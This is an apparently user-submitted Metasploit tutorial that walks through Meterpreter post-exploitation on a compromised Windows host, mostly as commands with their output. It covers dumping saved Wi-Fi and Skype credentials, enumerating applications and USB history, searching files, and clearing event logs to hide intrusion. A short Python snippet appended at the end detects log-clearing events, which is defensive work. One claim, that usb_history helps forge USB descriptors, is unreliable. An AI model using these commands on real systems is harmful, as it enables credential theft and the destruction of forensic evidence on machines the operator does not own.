Metasploit: Other Post-Exploitation Modules (Metasploit Intranet Pivoting)

User submission 282 2022-10-02



1. Collecting wireless SSID information

run post/windows/wlan/wlan_bss_list

meterpreter > run post/windows/wlan/wlan_bss_list

2. Collecting saved Wi-Fi passwords

run post/windows/wlan/wlan_profile

This collects the Wi-Fi login credentials saved on the target system.

meterpreter > run post/windows/wlan/wlan_profile

3. Getting the list of installed applications

run get_application_list

meterpreter > run get_application_list
[!] Meterpreter scripts are deprecated. Try post/windows/gather/enum_applications.
[!] Example: run post/windows/gather/enum_applications OPTION=value [...]

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 Radmin Server 3.5                                               3.50.0000
 WebFldrs XP                                                     9.50.7523

meterpreter >

4. Getting Skype passwords

run post/windows/gather/credentials/skype

meterpreter > run post/windows/gather/credentials/skype

5. Getting USB usage history

run post/windows/gather/usb_history

meterpreter > run post/windows/gather/usb_history
[*] Running module against LIUYAZHUANG
[*] D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    E: Disk 31ac31ab
[-] No USB devices appear to have been connected to this host.
meterpreter >

Using this module makes it easy to forge a USB descriptor and hardware ID.

6. Searching for files

meterpreter > search -f *.doc
Found 6 results...
    c:\Documents and Settings\Default User\Templates\winword.doc (4608 bytes)
    c:\Documents and Settings\Default User\Templates\winword2.doc (1769 bytes)
    c:\Documents and Settings\lyz\Templates\winword.doc (4608 bytes)
    c:\Documents and Settings\lyz\Templates\winword2.doc (1769 bytes)
    c:\WINDOWS\system32\config\systemprofile\Templates\winword.doc (4608 bytes)
    c:\WINDOWS\system32\config\systemprofile\Templates\winword2.doc (1769 bytes)
meterpreter >

7. Clearing logs on the target system

clearev

meterpreter > clearev
[*] Wiping 190 records from Application...
[*] Wiping 286 records from System...

Another module for handling logs is event_manager.

meterpreter > run event_manager
Meterpreter Script for Windows Event Log Query and Clear.

OPTIONS:

    -c   Clear a given Event Log (or ALL if no argument specified)
    -f   Event ID to filter events on
    -h   Help menu
    -i   Show information about Event Logs on the System and their configuration
    -l   List a given Event Log.
    -p   Supress printing filtered logs to screen
    -s   Save logs to local CSV file, optionally specify alternate folder in which to save logs

meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
====================

 Name                   Retention  Maximum Size  Records
 ----                   ---------  ------------  -------
 Application            Disabled   524288K       0
 Security               Disabled   524288K       Access Denied
 System                 Disabled   524288K       0
 ThinPrint Diagnostics  Disabled   K             1

meterpreter > run event_manager -c
[-] You must specify and eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] Security:
[*] Clearing Security
[-] Failed to Clear Security, Access Denied
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
[*] ThinPrint Diagnostics:
[*] Clearing ThinPrint Diagnostics
[*] Event Log ThinPrint Diagnostics Cleared!
meterpreter >
meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
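
For the defensive side of the log clearing shown in section 7: on Windows Vista and later, clearing a log leaves its own record behind (event 1102 in Security, 104 in System). The Python below is an added example, not part of the original post; it scans event XML of the kind `wevtutil qe <log> /f:xml /e:Events` exports for those records, and the host name, account and timestamps in the sample are constructed.

```python
import xml.etree.ElementTree as ET

# "Log cleared" records on Windows Vista and later: 1102 is written to the
# Security log, 104 to the System log (for Application, System, other channels).
# XP-era hosts like the one in the transcript use other IDs (517 for Security).
CLEAR_IDS = {("Security", 1102), ("System", 104)}
EVT = 'xmlns="http://schemas.microsoft.com/win/2004/08/events/event"'
LOG = 'xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog"'

def event(eid, channel, time, userdata=""):
    """Build one constructed record in the layout of `wevtutil qe <log> /f:xml`."""
    return (f'<Event {EVT}><System><EventID>{eid}</EventID>'
            f'<TimeCreated SystemTime="{time}"/><Channel>{channel}</Channel>'
            f'<Computer>HOST-EXAMPLE</Computer></System>{userdata}</Event>')

def cleared(fields):
    return f'<UserData><LogFileCleared {LOG}>{fields}</LogFileCleared></UserData>'

# Constructed sample: host, account and timestamps are made up.
SAMPLE = "<Events>" + "".join([
    event(7036, "System", "2022-10-02T08:14:00Z"),  # unrelated service event
    event(104, "System", "2022-10-02T08:15:01Z", cleared(
        "<SubjectUserName>exampleuser</SubjectUserName><Channel>Application</Channel>")),
    event(1102, "Security", "2022-10-02T08:15:02Z", cleared(
        "<SubjectUserName>exampleuser</SubjectUserName>")),
]) + "</Events>"

def local(tag):
    return tag.rsplit("}", 1)[-1]  # drop the "{namespace}" prefix

def find_log_clears(xml_text):
    hits = []
    for ev in ET.fromstring(xml_text):
        parts = {local(c.tag): c for c in ev}
        sysd = {local(e.tag): e for e in parts["System"]}
        key = (sysd["Channel"].text, int(sysd["EventID"].text))
        if key not in CLEAR_IDS:
            continue
        ud = parts.get("UserData")
        data = {local(e.tag): e.text for e in ud.iter()} if ud is not None else {}
        hits.append({"time": sysd["TimeCreated"].get("SystemTime"),
                     "host": sysd["Computer"].text,
                     "cleared": data.get("Channel", key[0]),  # 1102 has no Channel field
                     "user": data.get("SubjectUserName", "?")})
    return hits

if __name__ == "__main__":
    for hit in find_log_clears(SAMPLE):
        print(hit)
```

Because these records are written to the same logs that were just cleared, forwarding them to a central collector keeps them available even if the log is wiped again.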

